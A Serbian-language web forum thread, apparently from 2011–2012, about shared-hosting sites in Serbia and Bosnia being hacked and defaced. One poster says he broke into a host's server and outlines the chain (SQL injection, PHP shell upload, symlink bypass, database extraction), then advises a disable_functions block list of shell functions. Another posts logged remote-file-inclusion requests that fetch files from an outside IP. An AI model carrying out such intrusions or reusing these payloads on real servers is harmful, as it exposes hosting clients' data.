Vidis da opet ne razumes. Ja sam rekao sta ako neke stvari nisu ok na desktop varijanti primera radi da mi trebaju neke aplikacije koje ne rade na linuxu ? Mislim da si zapeo oko gluposti, ista prica je pocela i sa "sa hakerima" jao imas linux ti mora da si haker. Tako da probudi se.

Ne znam zasto se oko real time zastiti brines zasto je ne postavim i ko je rekao da je npr nemam ? Zamolicu te jos jednom da procitas temu posto odgovaras napamet. DAKLE JA SAM TEMU OTVORIO DA INFORMISEM LJUDE A NE DA TRAZIM POMOC OD NEKOG, DA LI SAM JA TRAZIO POMOC OD NEKOG? Ne nisam, ja sam rekao ljudima za ovaj problem i neka se svi ostali ukljuce u diskusiju kako ga resiti. Ako ko ima volje i zelje da podeli znanje.

I btw sada sam na win7 ali opet pricas napamet :)

DAKLE SAMO CU ZAMOLITI DA SE LJUDI NE PETLJAJU AKO NE ZNAJU O CEMU SE RADI. Hvala

P.S. Da drzao sam caps jer se derem da me bolje cuju.

Nekad sam radio na intervencijama pa mozda postavljam suvise provokativna pitanja ;)

Da se ne bi prepucavali nisam napisao da ti treba da postavljas real time zastitu, procitaj, ok, da zavrsimo

Ok sve ql :)

http://www.lsv.org.rs/
http://sps.org.rs/
http://www.vracar.ds.org.rs/
http://beogradskisindikat.com/
http://duga.tv/

Admini na orionu/sezamu/neobee slabo rade bilo sta da se stanje popravi, na pitanja korisnika zasto je do toga doslo kazu da nije scripta koja radi na serveru u redu, a iz ove teme se vidi da nije tako.
Naplacuju vracanje backupa, a pitanje je novac koji je odvojen za taj hosting zasto hosting nije kvalitetan. Za ovo ima resenje i ono je promena hosting provajdera, na nekog ko je vise posvecen klijentima.

Danas sam razgovarao sa "strucnim licem" u Orion Hostingu i ubedjivao me je da sigurno imam propust u nekim skriptama jer nam je samo tri puta u poslednja tri meseca haknut sajt.

Moze biti i jedno i drugo. Definitivno je problem na Orion serverima,ali mozda ima problema i do tvog sajta. Koji je sajt u pitanju?

Ja sam premestio sve sajtove sa oriona i nemam odavno problema, tamo su jednostavno bili neresivi. Ljudi na novom hostingu znaju sta se desava na orionu i zbog cega, tako da je sve ok. Za moj slucaj definitivno scripte nisu bile problem vec hosting...

malo sam burgijao i uporedjivao sve i svasta tako da sam dosao do saznanja da je zadnji put kompletan sajt obrisan od strane nekog ko se zakacio preko ftp-a. trenutno jurim IP adresu posto je pristupano preko domacih provajdera. mozda i bude nesto korisno od mog burgijanja.
da li postoji nacin da utvrdim da li je jos neki sajt sa istog servera haknut?

Postoji,pogledas sve domene sa tog servera i odes na www.zone-h.org i vidis koji su sajtovi sruseni.

Ja evo moram da pohvalim momke uz leftora (leftor.ba), brzi, ljubazni i efikasni, a sa hostingom nemam nikakvih problema, sve radi savrseno. Nije bas u skladu sa temom, ali bilo je govora i o tome, pa reko da podjelim svoje iskustvo. ;)
Ovih dana ce se zakupiti jos jedan paket, tako da i to govori o zadovoljstvu korisnika usluga :)

Hmm nije bilo govora o tome ali dobro, ajd da bacis koju reklamu. Ovde se samo pisalo o najnovojim nacinima "hakovanja" sajtova. :)

Ovo je vise preporuka, je dolazi iz ugla korisnika :)

Ne bih ni malo preporucivao leftor.ba
Bukvalno 10 minuta je bilo potrebno da im pristupim server-u i da pregledam informacije o svakom njihovom klijentu.

Radi dokaza evo vam nekoliko SS-a od njihovih domain register account-a.









Metoda upada na server je vrlo jednostavna:

1.SQL injection na jednom sajtu na server-u
2.Upload PHPshell-a preko administracije
3.Symlink bypass do hosting direktorijuma na server-u gde se nalazi leftor.ba
4.Manipulacija baze podataka i extractovanje informacija

Nacin da se zastite od svega ovoga jeste da jednostavno urade custom Mod_Security , zabrane symlink takoreci edituju php.ini dodaju bar nesto od disabled functions posto nista nije disabled...
npr: system,shell_exec,exec,passthru,popen,symlink,dl
barem toliko da obican pocetnik ne moze da upadne.

I naravno chmodati svaki configuration file na 600 da preko symlinka cak i ako napadac uspe da napravi symlink da ne moze da cita configuration file.

Poenta ovog mog reply jeste da su skoro svi domaci hosting servisi ovakvi , toliko je jednostavno upasti na server a potom izvuci sve informacije koje su potrebne za Destrukciju ili bilo kakavu ilegalnu radnju da je to zalosno.

Nadam se da niko ovo ne gleda kao ismejavanje ili tako nesto zato sto "Mi ne bismo mogli jedni bez drugog" :)

^^

Vise nego korisna informacija.

albanci su opet aktivni u poslednjih dva-tri dana i opet pokusavaju da zakupe hosting nalog sa ukradenim karticama.

Vidim da su juce srusili preko 100 sajtova,od sajta http://www.predsednikskupstine...,www.srpskaradikalnastranka.rs i mnogih drugih...

danas je stradala Niska televizija http://www.b92.net/info/komentari.php?nav_id=565798

@view
Nazalost ni vas hosting nije toliko siguran, istom metodom kao i za leftor.ba je omogucen upad na vas server.
Ukoliko vec ne znate toliko da zastitite vas server makar prebacite hosting022.com na neki vps , da ne moze da se pridje whmcs-u.

edit na zahtev

_{[Ovu poruku je menjao Gojko Vujovic dana 19.12.2011. u 18:11 GMT+1]}

Ti se upisa u sve

Lool..

Majstore, ajde ako te ne mrzi, kad stigneš..

Kakvi su ovi? http://www.one.com

Mladi gospodin Sun-Tzu sa kojim sam imao negativna iskustva a koliko znam i ceo ES forum danas je dolijao http://mojasrbija.com/2012/03/...dovao-podatke-800-000-sajtova/

@view

Da li ste imali losa iskustva u smislu oborio vam je sajtove ili vas je lupio po usima zbog lose bezbednosti hostinga ?

Mogli bi ste se potpisati da znam sa kim pricam?

Svaki shared hosting je pun rupa zbog ispunjavanja zelja korisnika za ukljucivanjem rizicnih dozvola.Nije oborio sajtove ali objavio je neke nase finansijske detalje sto ipak smatram da nije u redu i da je mnogo gore od difejsovanja.

Svasta. Sta sve necu procitati...

Pa potrudi se da 022 nema rupa.

Neka je uhapšen, bar znam o kojim hosting provajderima ću širiti samo negativne kritike.

Upali Albanci sinoć na server Eutelnet-a, defacovali sve sajtove.

Sreća pa su ažurni pa će u roku od par sati vratiti svima bekape. (sreća pa imam samo jedan sajt kod njih)

Na svim njihovim sajtovima...

Zaista korisna tema.
Ako znaš da napadneš, onda ćeš znati i da se odbraniš.

Baš često pokušavaju da napadnu moje sajtove na ovaj ili onaj način.
Najčešći je tako što pokušavaju da pogode admin panel od wordpressa.
Još da imam wordpress... :D

Pre par dana su pokušali ovako

Fajl: /myevent.php?myevent_path=http://91.121.200.97/allnet.jpg??
Time: 16.07.2012. / 23:17:23
Referer: No referer
Host: li427-121.members.linode.com
User: Gost (IP: 50.116.21.121 / Browser: Mozilla/5.0)



Fajl: /myevent.php?myevent_path=http://91.121.200.97/byroe.jpg??
Time: 16.07.2012. / 23:17:21
Referer: No referer
Host: li427-121.members.linode.com
User: Gost (IP: 50.116.21.121 / Browser: Mozilla/5.0)

pa hakovani su i sajtovi neki sa optima telekoma u hr konkretno sajt mog prijatelja

u tom postu pise
hacked by Kosova hackers group znaci i oni su nastavili da rade
pozdrav